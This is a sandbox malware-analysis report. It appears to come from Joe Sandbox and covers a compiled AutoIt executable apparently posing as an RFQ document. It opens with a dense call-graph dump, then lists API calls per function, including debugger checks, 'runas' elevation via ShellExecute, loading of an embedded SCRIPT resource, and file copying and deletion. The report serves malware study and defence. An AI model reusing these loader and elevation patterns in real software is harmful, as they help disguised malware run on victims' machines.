99870->99875 99871 e6cf8 99876 e7c8e 59 API calls 99871->99876 99873 11e8f1 99906 e6e6c Mailbox 99873->99906 99877 11e8d5 99875->99877 99878 11e8f6 99875->99878 99879 e6d09 SetCurrentDirectoryW 99876->99879 99881 e4faa 84 API calls 99877->99881 99880 e4faa 84 API calls 99878->99880 99884 e6d1c Mailbox 99879->99884 99882 11e8fb 99880->99882 99881->99867 99883 100ff6 Mailbox 59 API calls 
99882->99883 99890 11e92f 99883->99890 99887 e3bcd 99887->98566 99887->98575 100029 e766f 59 API calls 2 library calls 99890->100029 99895 11eb69 100035 147581 59 API calls Mailbox 99895->100035 99899 11eb8b 100036 14f835 59 API calls 2 library calls 99899->100036 99902 11eb98 99904 102f95 _free 58 API calls 99902->99904 99904->99906 99935 e5934 99906->99935 99918 e7f41 59 API calls 99925 11e978 Mailbox 99918->99925 99922 11ebbb 100037 13fcb1 89 API calls 4 library calls 99922->100037 99924 11ebd4 99926 102f95 _free 58 API calls 99924->99926 99925->99895 99925->99918 99925->99922 100030 13fc4d 59 API calls 2 library calls 99925->100030 100031 13fb6e 61 API calls 2 library calls 99925->100031 100032 147621 59 API calls Mailbox 99925->100032 100033 e766f 59 API calls 2 library calls 99925->100033 100034 e7373 59 API calls Mailbox 99925->100034 99927 11ebe7 99926->99927 99927->99906 99928->99812 99929->99825 99930->99825 99931->99825 99932->99825 99933->99825 99934->99821 99936 e5dcf CloseHandle 99935->99936 99937 e593c Mailbox 99936->99937 99938 e5dcf CloseHandle 99937->99938 99939 e594b 99938->99939 99939->99887 99940->99840 99942 e5dcf CloseHandle 99941->99942 99943 e5962 99942->99943 100040 e5df9 99943->100040 99945 e59a4 99945->99841 99945->99845 99946 e5981 99946->99945 100048 e5770 99946->100048 99948 e5993 100065 e53db SetFilePointerEx SetFilePointerEx 99948->100065 99950 e599a 99950->99945 99951 11e030 99950->99951 100066 143696 SetFilePointerEx SetFilePointerEx WriteFile 99951->100066 99953 11e060 99953->99945 99954->99853 99955->99869 99962 e5c68 99956->99962 99957 e5cef SetFilePointerEx 100079 e5dae SetFilePointerEx 99957->100079 99958 11e151 100080 e5dae SetFilePointerEx 99958->100080 99961 11e16b 99962->99957 99962->99958 99963 e5cc3 99962->99963 99963->99849 99965 e77c7 59 API calls 99964->99965 99966 e470f 99965->99966 99967 e77c7 59 API calls 99966->99967 99968 e4717 99967->99968 99969 e77c7 59 API calls 99968->99969 99970 e471f 99969->99970 99971 
e77c7 59 API calls 99970->99971 99972 e4727 99971->99972 99973 e475b 99972->99973 99974 11d8fb 99972->99974 99975 e79ab 59 API calls 99973->99975 99976 e81a7 59 API calls 99974->99976 99977 e4769 99975->99977 99978 11d904 99976->99978 99979 e7e8c 59 API calls 99977->99979 99980 e7eec 59 API calls 99978->99980 99981 e4773 99979->99981 99983 e479e 99980->99983 99982 e79ab 59 API calls 99981->99982 99981->99983 99985 e4794 99982->99985 99986 e47bd 99983->99986 99997 11d924 99983->99997 100001 e47de 99983->100001 99988 e7e8c 59 API calls 99985->99988 99990 e7b52 59 API calls 99986->99990 99987 e47ef 99991 e4801 99987->99991 99994 e81a7 59 API calls 99987->99994 99988->99983 99989 11d9f4 99992 e7d2c 59 API calls 99989->99992 99993 e47c7 99990->99993 99995 e4811 99991->99995 99996 e81a7 59 API calls 99991->99996 100010 11d9b1 99992->100010 100000 e79ab 59 API calls 99993->100000 99993->100001 99994->99991 99999 e4818 99995->99999 100002 e81a7 59 API calls 99995->100002 99996->99995 99997->99989 99998 11d9dd 99997->99998 100009 11d95b 99997->100009 99998->99989 100005 11d9c8 99998->100005 100003 e81a7 59 API calls 99999->100003 100012 e481f Mailbox 99999->100012 100000->100001 100081 e79ab 100001->100081 100002->99999 100003->100012 100004 e7b52 59 API calls 100004->100010 100008 e7d2c 59 API calls 100005->100008 100006 11d9b9 100007 e7d2c 59 API calls 100006->100007 100007->100010 100008->100010 100009->100006 100013 11d9a4 100009->100013 100010->100001 100010->100004 100094 e7a84 59 API calls 2 library calls 100010->100094 100012->99871 100014 e7d2c 59 API calls 100013->100014 100014->100010 100026->99841 100027->99846 100028->99873 100029->99925 100030->99925 100031->99925 100032->99925 100033->99925 100034->99925 100035->99899 100036->99902 100037->99924 100041 11e181 100040->100041 100042 e5e12 CreateFileW 100040->100042 100043 11e187 CreateFileW 100041->100043 100045 e5e34 100041->100045 100042->100045 100044 11e1ad 100043->100044 100043->100045 100046 e5c4e 2 API 
calls 100044->100046 100045->99946 100047 11e1b8 100046->100047 100047->100045 100049 e578b 100048->100049 100050 11dfce 100048->100050 100051 e5c4e 2 API calls 100049->100051 100064 e581a 100049->100064 100050->100064 100073 e5e3f 100050->100073 100052 e57ad 100051->100052 100054 e538e 59 API calls 100052->100054 100055 e57b7 100054->100055 100055->100050 100056 e57c4 100055->100056 100057 100ff6 Mailbox 59 API calls 100056->100057 100058 e57cf 100057->100058 100059 e538e 59 API calls 100058->100059 100060 e57da 100059->100060 100067 e5d20 100060->100067 100062 e5807 100063 e5c4e 2 API calls 100062->100063 100063->100064 100064->99948 100065->99950 100066->99953 100068 e5d93 100067->100068 100071 e5d2e 100067->100071 100078 e5dae SetFilePointerEx 100068->100078 100070 e5d56 100070->100062 100071->100070 100072 e5d66 ReadFile 100071->100072 100072->100070 100072->100071 100074 e5c4e 2 API calls 100073->100074 100075 e5e60 100074->100075 100076 e5c4e 2 API calls 100075->100076 100077 e5e74 100076->100077 100077->100064 100078->100071 100079->99963 100080->99961 100082 e79ba 100081->100082 100083 e7a17 100081->100083 100082->100083 100084 e79c5 100082->100084 100085 e7e8c 59 API calls 100083->100085 100086 11ef32 100084->100086 100087 e79e0 100084->100087 100091 e79e8 _memmove 100085->100091 100088 e8189 59 API calls 100086->100088 100095 e8087 59 API calls Mailbox 100087->100095 100090 11ef3c 100088->100090 100092 100ff6 Mailbox 59 API calls 100090->100092 100091->99987 100093 11ef5c 100092->100093 100094->100010 100095->100091 100097 e6ef5 100096->100097 100101 e7009 100096->100101 100098 100ff6 Mailbox 59 API calls 100097->100098 100097->100101 100100 e6f1c 100098->100100 100099 100ff6 Mailbox 59 API calls 100105 e6f91 100099->100105 100100->100099 100101->98713 100105->100101 100109 e63a0 100105->100109 100135 e74bd 59 API calls Mailbox 100105->100135 100136 136ac9 59 API calls Mailbox 100105->100136 100137 e766f 59 API calls 2 library calls 100105->100137 
100107->98715 100108->98717 100138 e7b76 100109->100138 100111 e65ca 100116 e63c5 100116->100111 100117 11e41f 100116->100117 100118 11e3eb _memmove 100116->100118 100119 e766f 59 API calls 100116->100119 100124 e7eec 59 API calls 100116->100124 100126 e68f9 100116->100126 100128 11e3bb 100116->100128 100132 e7faf 59 API calls 100116->100132 100143 e60cc 60 API calls 100116->100143 100118->100117 100118->100126 100119->100116 100124->100116 100135->100105 100136->100105 100137->100105 100139 100ff6 Mailbox 59 API calls 100138->100139 100140 e7b9b 100139->100140 100141 e8189 59 API calls 100140->100141 100142 e7baa 100141->100142 100142->100116 100143->100116 100151->98731 100152->98732 100677 120226 100678 eade2 Mailbox 100677->100678 100680 120c86 100678->100680 100682 120c8f 100678->100682 100684 1200e0 VariantClear 100678->100684 100685 eb6c1 100678->100685 100691 15474d 100678->100691 100700 15e237 100678->100700 100703 14d2e6 100678->100703 100750 f2123 100678->100750 100790 e9df0 59 API calls Mailbox 100678->100790 100791 137405 59 API calls 100678->100791 100793 1366f4 100680->100793 100684->100678 100792 14a0b5 89 API calls 4 library calls 100685->100792 100692 e9997 84 API calls 100691->100692 100693 154787 100692->100693 100694 e63a0 94 API calls 100693->100694 100695 154797 100694->100695 100696 1547bc 100695->100696 100697 ea000 341 API calls 100695->100697 100699 1547c0 100696->100699 100796 e9bf8 100696->100796 100697->100696 100699->100678 100701 15cdf1 130 API calls 100700->100701 100702 15e247 100701->100702 100702->100678 100704 14d305 100703->100704 100705 14d310 100703->100705 100809 e9c9c 59 API calls 100704->100809 100708 e77c7 59 API calls 100705->100708 100740 14d3ea Mailbox 100705->100740 100707 100ff6 Mailbox 59 API calls 100709 14d433 100707->100709 100710 14d334 100708->100710 100711 14d43f 100709->100711 100812 e5906 60 API calls Mailbox 100709->100812 100712 e77c7 59 API calls 100710->100712 100714 e9997 84 API calls 100711->100714 

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000E3B7A
                                              • IsDebuggerPresent.KERNEL32 ref: 000E3B8C
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,001A62F8,001A62E0,?,?), ref: 000E3BFD
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                                • Part of subcall function 000F0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000E3C26,001A62F8,?,?,?), ref: 000F0ACE
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 000E3C81
                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001993F0,00000010), ref: 0011D4BC
                                              • SetCurrentDirectoryW.KERNEL32(?,001A62F8,?,?,?), ref: 0011D4F4
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00195D40,001A62F8,?,?,?), ref: 0011D57A
                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0011D581
                                                • Part of subcall function 000E3A58: GetSysColorBrush.USER32(0000000F), ref: 000E3A62
                                                • Part of subcall function 000E3A58: LoadCursorW.USER32(00000000,00007F00), ref: 000E3A71
                                                • Part of subcall function 000E3A58: LoadIconW.USER32(00000063), ref: 000E3A88
                                                • Part of subcall function 000E3A58: LoadIconW.USER32(000000A4), ref: 000E3A9A
                                                • Part of subcall function 000E3A58: LoadIconW.USER32(000000A2), ref: 000E3AAC
                                                • Part of subcall function 000E3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000E3AD2
                                                • Part of subcall function 000E3A58: RegisterClassExW.USER32(?), ref: 000E3B28
                                                • Part of subcall function 000E39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000E3A15
                                                • Part of subcall function 000E39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000E3A36
                                                • Part of subcall function 000E39E7: ShowWindow.USER32(00000000,?,?), ref: 000E3A4A
                                                • Part of subcall function 000E39E7: ShowWindow.USER32(00000000,?,?), ref: 000E3A53
                                                • Part of subcall function 000E43DB: _memset.LIBCMT ref: 000E4401
                                                • Part of subcall function 000E43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000E44A6
                                              Strings
                                              • This is a third-party compiled AutoIt script., xrefs: 0011D4B4
                                              • runas, xrefs: 0011D575
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                              • API String ID: 529118366-3287110873
                                              • Opcode ID: 2c509f9c0257098d0dc9bdb29d0b5e259219ba7902a8b32b35047d8be08be247
                                              • Instruction ID: a5aea7fc4f65616202744e7434a894a81b68f64a32fc05ede61ae3e90b56a642
                                              • Opcode Fuzzy Hash: 2c509f9c0257098d0dc9bdb29d0b5e259219ba7902a8b32b35047d8be08be247
                                              • Instruction Fuzzy Hash: C951E671908288AECF11EBB5EC09AFD7F79AB05300B18417AF455B31A2DB749686CB21

                                              Control-flow Graph

                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 000E4B2B
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              • GetCurrentProcess.KERNEL32(?,0016FAEC,00000000,00000000,?), ref: 000E4BF8
                                              • IsWow64Process.KERNEL32(00000000), ref: 000E4BFF
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 000E4C45
                                              • FreeLibrary.KERNEL32(00000000), ref: 000E4C50
                                              • GetSystemInfo.KERNEL32(00000000), ref: 000E4C81
                                              • GetSystemInfo.KERNEL32(00000000), ref: 000E4C8D
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: a5ef6e887ff4b3df9b47420b41bab253d8dec1cdbf07bf2a7ebbf3dbb06ad4a9
                                              • Instruction ID: 9094b3b12be4b17329f21669800cca38af696d04264794916911d4cbb5468bf4
                                              • Opcode Fuzzy Hash: a5ef6e887ff4b3df9b47420b41bab253d8dec1cdbf07bf2a7ebbf3dbb06ad4a9
                                              • Instruction Fuzzy Hash: 6391E43154A7C0DEC735CB7998512AABFE4AF2A300B584DAED0CBA3A01D320F948C759

                                              Control-flow Graph

                                              APIs
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000E4EEE,?,?,00000000,00000000), ref: 000E4FF9
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000E4EEE,?,?,00000000,00000000), ref: 000E5010
                                              • LoadResource.KERNEL32(?,00000000,?,?,000E4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000E4F8F), ref: 0011DD60
                                              • SizeofResource.KERNEL32(?,00000000,?,?,000E4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000E4F8F), ref: 0011DD75
                                              • LockResource.KERNEL32(000E4EEE,?,?,000E4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000E4F8F,00000000), ref: 0011DD88
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: 36e2f991422d6144c2febe48afd13f6fcb4ed4b259d5af4df03084816ba68e3a
                                              • Instruction ID: 1e94bac006fc20802870bfc6ac5b199a2f3cfc7abb79702b74a7448855abfba6
                                              • Opcode Fuzzy Hash: 36e2f991422d6144c2febe48afd13f6fcb4ed4b259d5af4df03084816ba68e3a
                                              • Instruction Fuzzy Hash: B4117C75200700BFD7218B66EC58F677BBDEBC9B16F20456CF406D66A0DBB1EC418A60
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,0011E7C1), ref: 001446A6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 001446B7
                                              • FindClose.KERNEL32(00000000), ref: 001446C7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: 1939814b3bbe6ca716074a72d66d1e7c7d909e067aa09dcd59e6be0b2512a9a7
                                              • Instruction ID: 941b9dca822fb9166f9735a1927df65f936370f7bb184e0f0120ef4a7a24060f
                                              • Opcode Fuzzy Hash: 1939814b3bbe6ca716074a72d66d1e7c7d909e067aa09dcd59e6be0b2512a9a7
                                              • Instruction Fuzzy Hash: 37E0D8318104005B42106738FC4D4EA775C9F06335F11071AF875C15F0E7F09991C999
                                              Strings
                                              • Variable must be of type 'Object'., xrefs: 0012428C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable must be of type 'Object'.
                                              • API String ID: 0-109567571
                                              • Opcode ID: fd53553d987bef1810f44c4c5b8a7908c297e74197ddd2691e78df967b5ae099
                                              • Instruction ID: 2ae8e2bb9ea1531cc61affac28d5fb5b13a8a81ac643c02a422a426e634cedc4
                                              • Opcode Fuzzy Hash: fd53553d987bef1810f44c4c5b8a7908c297e74197ddd2691e78df967b5ae099
                                              • Instruction Fuzzy Hash: 60A27E74A04299CFCB24CF55D880AAEB7F1FF59300F248069E916AB351D775ED82CB91
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000F0BBB
                                              • timeGetTime.WINMM ref: 000F0E76
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000F0FB3
                                              • TranslateMessage.USER32(?), ref: 000F0FC7
                                              • DispatchMessageW.USER32(?), ref: 000F0FD5
                                              • Sleep.KERNEL32(0000000A), ref: 000F0FDF
                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 000F105A
                                              • DestroyWindow.USER32 ref: 000F1066
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000F1080
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 001252AD
                                              • TranslateMessage.USER32(?), ref: 0012608A
                                              • DispatchMessageW.USER32(?), ref: 00126098
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001260AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                              • API String ID: 4003667617-3242690629
                                              • Opcode ID: c38b571317e4524b8f6e1c9de1157cd341402b1dac6f307cc2df11c1ad03e513
                                              • Instruction ID: a64a90af88873b00bc3233b5744d49719ee051e54667e50ceae2bf365191f56e
                                              • Opcode Fuzzy Hash: c38b571317e4524b8f6e1c9de1157cd341402b1dac6f307cc2df11c1ad03e513
                                              • Instruction Fuzzy Hash: E1B2F270608751DFD728DF24D884BAEBBE1BF84304F14491DF58A976A2DB70E894DB82

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 001491E9: __time64.LIBCMT ref: 001491F3
                                                • Part of subcall function 000E5045: _fseek.LIBCMT ref: 000E505D
                                              • __wsplitpath.LIBCMT ref: 001494BE
                                                • Part of subcall function 0010432E: __wsplitpath_helper.LIBCMT ref: 0010436E
                                              • _wcscpy.LIBCMT ref: 001494D1
                                              • _wcscat.LIBCMT ref: 001494E4
                                              • __wsplitpath.LIBCMT ref: 00149509
                                              • _wcscat.LIBCMT ref: 0014951F
                                              • _wcscat.LIBCMT ref: 00149532
                                                • Part of subcall function 0014922F: _memmove.LIBCMT ref: 00149268
                                                • Part of subcall function 0014922F: _memmove.LIBCMT ref: 00149277
                                              • _wcscmp.LIBCMT ref: 00149479
                                                • Part of subcall function 001499BE: _wcscmp.LIBCMT ref: 00149AAE
                                                • Part of subcall function 001499BE: _wcscmp.LIBCMT ref: 00149AC1
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001496DC
                                              • _wcsncpy.LIBCMT ref: 0014974F
                                              • DeleteFileW.KERNEL32(?,?), ref: 00149785
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0014979B
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001497AC
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001497BE
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              • Opcode ID: b828fe8e49c23ff3256dd1aa08b5662cba7f84abdba65660857c3549b0f5ead0
                                              • Instruction ID: 557bc122d8136215b73397460756a66d6bbbfafa189ce240a0f286afda2b570c
                                              • Opcode Fuzzy Hash: b828fe8e49c23ff3256dd1aa08b5662cba7f84abdba65660857c3549b0f5ead0
                                              • Instruction Fuzzy Hash: 96C128B1D00229AEDF21DFA5CC85ADFB7BDAF54314F0040AAF609E6151EB709A848F65

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 000E3074
                                              • RegisterClassExW.USER32(00000030), ref: 000E309E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E30AF
                                              • InitCommonControlsEx.COMCTL32(?), ref: 000E30CC
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000E30DC
                                              • LoadIconW.USER32(000000A9), ref: 000E30F2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000E3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 4c4112f80bf4c01487826a4e5cbb69ce9c2c010f995a5e7e0389d976066e171f
                                              • Instruction ID: cb6b460cf4d653d6b8322da3a69ecd019d01d64d63da41668375f07d143fd30c
                                              • Opcode Fuzzy Hash: 4c4112f80bf4c01487826a4e5cbb69ce9c2c010f995a5e7e0389d976066e171f
                                              • Instruction Fuzzy Hash: C0315871845309EFDB01DFA4EC85AC9BBF4FB0A320F18456EE590E66A0D3B90982CF50

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 000E3074
                                              • RegisterClassExW.USER32(00000030), ref: 000E309E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E30AF
                                              • InitCommonControlsEx.COMCTL32(?), ref: 000E30CC
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000E30DC
                                              • LoadIconW.USER32(000000A9), ref: 000E30F2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000E3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 47fa82ff475cfe39f62197ea9e7b253ecff736babe6bbfd9de429980df5d94a8
                                              • Instruction ID: 25a32b5f1a891701fe5222505c1fa4b61f2ad070f00055e26f0277ac79c694ea
                                              • Opcode Fuzzy Hash: 47fa82ff475cfe39f62197ea9e7b253ecff736babe6bbfd9de429980df5d94a8
                                              • Instruction Fuzzy Hash: 3E21C2B5901318AFDB00DFA4ED89BDDBBF8FB09710F04812AFA10A66A0D7B545858F91

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 000E4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001A62F8,?,000E37C0,?), ref: 000E4882
                                                • Part of subcall function 0010074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000E72C5), ref: 00100771
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000E7308
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0011ECF1
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0011ED32
                                              • RegCloseKey.ADVAPI32(?), ref: 0011ED70
                                              • _wcscat.LIBCMT ref: 0011EDC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: c962dc5984a6069da0f51a17cfa2b006e6fb01b47d1d4316f15f5c3d79fa792c
                                              • Instruction ID: 4299de53d5f33fd2322ce11baa6b60d526c6aa698035eb9a94a012c239e6da25
                                              • Opcode Fuzzy Hash: c962dc5984a6069da0f51a17cfa2b006e6fb01b47d1d4316f15f5c3d79fa792c
